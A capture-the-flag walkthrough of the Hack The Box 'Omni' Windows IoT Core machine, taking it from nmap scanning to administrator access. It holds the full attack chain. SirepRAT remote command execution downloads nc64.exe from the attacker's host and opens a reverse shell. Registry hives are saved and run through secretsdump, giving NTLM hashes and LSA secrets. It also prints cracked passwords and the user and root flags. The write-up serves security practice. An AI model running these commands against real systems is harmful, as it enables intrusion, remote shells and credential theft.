NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-24 10:18 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating NSE at 10:18
Completed NSE at 10:18, 0.00s elapsed
Initiating Ping Scan at 10:18
Scanning 10.10.10.204 [4 ports]
Completed Ping Scan at 10:18, 0.52s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:18
Scanning omni.htb (10.10.10.204) [1000 ports]
Discovered open port 135/tcp on 10.10.10.204
Discovered open port 8080/tcp on 10.10.10.204
Completed SYN Stealth Scan at 10:18, 29.60s elapsed (1000 total ports)
Initiating Service scan at 10:18
Scanning 2 services on omni.htb (10.10.10.204)
Completed Service scan at 10:18, 8.70s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against omni.htb (10.10.10.204)
Retrying OS detection (try #2) against omni.htb (10.10.10.204)
Initiating Traceroute at 10:19
Completed Traceroute at 10:19, 0.43s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:19
Completed Parallel DNS resolution of 2 hosts. at 10:19, 0.32s elapsed
NSE: Script scanning 10.10.10.204.
Initiating NSE at 10:19
Completed NSE at 10:19, 8.33s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 1.43s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Nmap scan report for omni.htb (10.10.10.204)
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 410.29 ms 10.10.14.1
2 412.53 ms omni.htb (10.10.10.204)
NSE: Script Post-scanning.
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Initiating NSE at 10:19
Completed NSE at 10:19, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.23 seconds
Raw packets sent: 2100 (96.092KB) | Rcvd: 1023 (593.916KB)
ENUMERATION
So First we need to get information about the OS of our this device and What kind of Device it is !!
So if we google about omni we know that it might be kind of router something running Windows IOT core
So now we need to find exploit for that but first lets check both ports
PORT 8080
Here we need password for that so lets move further
PORT 135
Here we are getting connection Time Out
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #rpcclient -U " " 10.10.10.204 Enter TESTING\ 's password: Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
So Lets Google For That
Now for Windows IOT exploitation we will get our first link to Github named as SirepRAT – RCE as SYSTEM on Windows IoT Core
Just clone this to your machine
Now if we check all commands we can see through these that these 2 are more important we might need
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe"
python SirepRAT.py 192.168.3.17 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
So first lets go through basic command
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" <HResultResult | type: 1, payload length: 4, HResult: 0x0> <OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'> <ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
Here we got nothing just a word omni so lets run it with VERBOSE
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\hostname.exe" --v --------- omni --------- <HResultResult | type: 1, payload length: 4, HResult: 0x0> <OutputStreamResult | type: 11, payload length: 6, payload peek: 'omni'> <ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
Here we go with output
Lets Try something new with this command
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}" --v
---------
C:\Data\Users\System
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<OutputStreamResult | type: 11, payload length: 22, payload peek: 'C:\Data\Users\System'>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: ''>
Here we can see that we need a exe file to execute and in arguments we need command but not all commands
So lets fix this with Powershell.exe
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v
Now lets get reverse shell first to play with this machine further !!
STEPS WE ARE GOING TO FOLLOW NOW
Transfer 64 bit NC to omni machine
Then execute that get reverse shell to our machine
TRANSFER THE NC.EXE
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" --args "/c Invoke-Webrequest -Uri http://10.10.14.43/nc64.exe -OutFile C:\Data\Users\app\nc64.exe" --v <HResultResult | type: 1, payload length: 4, HResult: 0x0
Executing NC.EXE through cmd.exe
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\Data\Users\app\nc64.exe 10.10.14.43 9002 -e cmd.exe" --v <HResultResult | type: 1, payload length: 4, HResult: 0x0>
GETTING REVERSE SHELL
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #nc -lnvp 9002 listening on [any] 9002 ... connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. C:\windows\system32>
Now if you see we have both user and root txt files but some XML file with PowerShell Credentials . To decrypt them We need to be that particular user So to get User access we will be dumping some Reg Keys To get passwords for them
LINK TO HELP YOU :
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT] └──╼ #nc -lnvp 9002 listening on [any] 9002 ... connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49680 Microsoft Windows [Version 10.0.17763.107] Copyright (c) Microsoft Corporation. All rights reserved. C:\windows\system32>reg.exe save hklm\sam sam.save reg.exe save hklm\sam sam.save The operation completed successfully. C:\windows\system32>reg.exe save hklm\security security.save reg.exe save hklm\security security.save The operation completed successfully. C:\windows\system32> reg.exe save hklm\system system.save reg.exe save hklm\system system.save The operation completed successfully.
Now lets decrypt them
┌─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM
0000 14 07 22 73 99 42 B0 ED F5 11 9A 60 FD A1 10 EF .."s.B.....`....
0010 DF 19 3C 6C 22 F2 92 0C 34 B1 6D 78 CC A7 0D 14 ..<l"...4.mx....
0020 02 7B 81 04 1E F6 1C 66 69 75 69 84 A7 31 53 26 .{.....fiui..1S&
0030 A3 6B A9 C9 BF 18 A8 EF 10 36 DB C2 CC 27 73 3D .k.......6...'s=
NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up...
Now here we have NTLM hashes we will decrypt them
Here we got password for app user
app : mesh5143
GETTING USER ACCESS
But we cannot login through evil-winrm but we can try it on login page on port 8080
After login we will have a option to Run command which looks like already given shell
So we will be using our previously installed netcat to get our shell
Here we go our shell now we can decrypt those files as we are in terminal as user app
LINKS TO HELP YOU IN DECRYPTING FILES:
https://www.red-gate.com/simple-talk/sysadmin/powershell/portable-objects-in-powershell-with-clixml/
https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49676
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> cd c:\DATA\Users\App
PS C:\DATA\Users\app> ls
ls
Directory: C:\DATA\Users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-a---- 8/24/2020 4:38 AM 45272 nc64.exe
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\DATA\Users\app>
PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\user.txt
$cli = Import-Clixml C:\DATA\Users\app\user.txt
PS C:\DATA\Users\app> $cli | Get-Member
$cli | Get-Member
TypeName: System.Management.Automation.PSCredential
Name MemberType Definition
---- ---------- ----------
Equals Method bool Equals(System.Object obj)
GetHashCode Method int GetHashCode()
GetNetworkCredential Method System.Net.NetworkCredential GetNetworkCrede...
GetObjectData Method void GetObjectData(Microsoft.PowerShell.Core...
GetType Method type GetType()
ToString Method string ToString()
Password Property securestring Password {get;}
UserName Property string UserName {get;}
PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
7cfd50f6bc34db3204898f1505ad9d70
HERE WE GO WITH USER FLAG
NOW WE HAVE ONE MORE FILE WHICH IS XML AND WITH SAME FORMAT LETS DECRYPT THAT TOO
PS C:\DATA\Users\app> $cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml $cli = Import-Clixml C:\DATA\Users\app\iot-admin.xml PS C:\DATA\Users\app> $cli.GetNetworkCredential().Password $cli.GetNetworkCredential().Password _1nt3rn37ofTh1nGz PS C:\DATA\Users\app>
Here we got some Password lets try it with administrator on evil and login page but we will get it on login page done !!
administrator : _1nt3rn37ofTh1nGz
So lets get shell as administrator and decrypt root flag
Also if we try to use ls command in administrator directory we will be denied due to low privs!!
GETTING ROOT ACCESS
Just follow the same step to get reverse shell from webpage on our terminal !!
Their you will get shell as administrator
┌─[✗]─[root@liquid]─[~/Desktop/HTB/omni/SirepRAT]
└──╼ #rlwrap nc -lnvp 9009
listening on [any] 9009 ...
connect to [10.10.14.43] from (UNKNOWN) [10.10.10.204] 49677
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> cd C:\DATA\Users
cd C:\DATA\Users
PS C:\DATA\Users> cd Administrator
cd Administrator
PS C:\DATA\Users\Administrator> ls
ls
Directory: C:\DATA\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/3/2020 11:23 PM 3D Objects
d-r--- 7/3/2020 11:23 PM Documents
d-r--- 7/3/2020 11:23 PM Downloads
d----- 7/3/2020 11:23 PM Favorites
d-r--- 7/3/2020 11:23 PM Music
d-r--- 7/3/2020 11:23 PM Pictures
d-r--- 7/3/2020 11:23 PM Videos
-ar--- 7/4/2020 9:48 PM 1958 root.txt
PS C:\DATA\Users\Administrator> $cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
$cli = Import-Clixml C:\DATA\Users\Administrator\root.txt
PS C:\DATA\Users\Administrator> $cli.GetNetworkCredential().Password
$cli.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
PS C:\DATA\Users\Administrator>
Here we go with our root flag
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
